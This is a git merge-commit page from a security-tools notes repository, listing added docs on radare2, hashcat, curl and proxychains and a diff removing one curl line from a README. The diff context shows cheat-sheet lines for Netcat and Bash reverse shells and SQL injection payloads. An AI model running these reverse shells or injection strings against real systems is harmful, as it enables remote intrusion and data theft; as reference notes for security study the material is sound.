diff options
author | Malfurious <m@lfurio.us> | 2022-03-06 18:41:51 -0500 |
---|---|---|
committer | Malfurious <m@lfurio.us> | 2022-03-06 18:41:51 -0500 |
commit | 979df27c374181e2c1da8899a1f436d9a4ae29c8 (patch) | |
tree | b0ec2ff69ef1b446b4f75ffd8172e80a01de66f4 /README.txt | |
parent | 880ba95060a03ef5e0dea93c14c4a5c56470b528 (diff) | |
parent | a666136666e1ea6207cd3b7445fe9bc5ff3d59a8 (diff) | |
download | lib-des-gnux-979df27c374181e2c1da8899a1f436d9a4ae29c8.tar.gz lib-des-gnux-979df27c374181e2c1da8899a1f436d9a4ae29c8.zip |
Merge tag 'pull-duso-tool-docs' of https://github.com/Dusoleil/lib-des-gnux
Pulling an assortment of tools documentation from Dusoleil. I did fix 1
minor conflict in the readme file.
* tag 'pull-duso-tool-docs' of https://github.com/Dusoleil/lib-des-gnux: (21 commits)
Remove 'sudo' from install command.
Fix typo in for loop in asm rep prefix doc
Add install/uninstall instructions to radare doc
Add radare2 command cheatsheet
Add doc about fixing a ptrace error in debugger.
Add doc about the rep prefix on an x86 instruction
Add short doc on the one_gadget tool
Remove curl example line from README
Add cheatsheet of common flags for curl
Add a short doc with links to reqbin and hookbin
Add Short Doc About proxychains
Add Example that Uses Custom Charset
Update Incremental Examples to Use Short Flag
Add Info About Issues with Small Workload
Add More Mask/Hybrid Attacks to Examples
Add Examples for Showing Cracks/Identifying Type
Add --status Flag to Examples
Fix Paths in Examples
Remove "LIGHT"/"HEAVY" Descriptors from Examples
Add hashcat doc
...
Diffstat (limited to 'README.txt')
-rw-r--r-- | README.txt | 1 |
1 files changed, 0 insertions, 1 deletions
@@ -19,7 +19,6 @@ nc 10.0.0.1 1234 -e cmd.exe # Netcat reverse shell (Windows) bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash reverse shell ' OR 1=1-- # SQL inject (pass) ' OR 1=1 UNION SELECT x,y,z FROM table-- # SQL inject (leak) -curl -i -X POST -d 'a=b&c=d' -F 'f=@file;filename=asdf' URL # curl post request |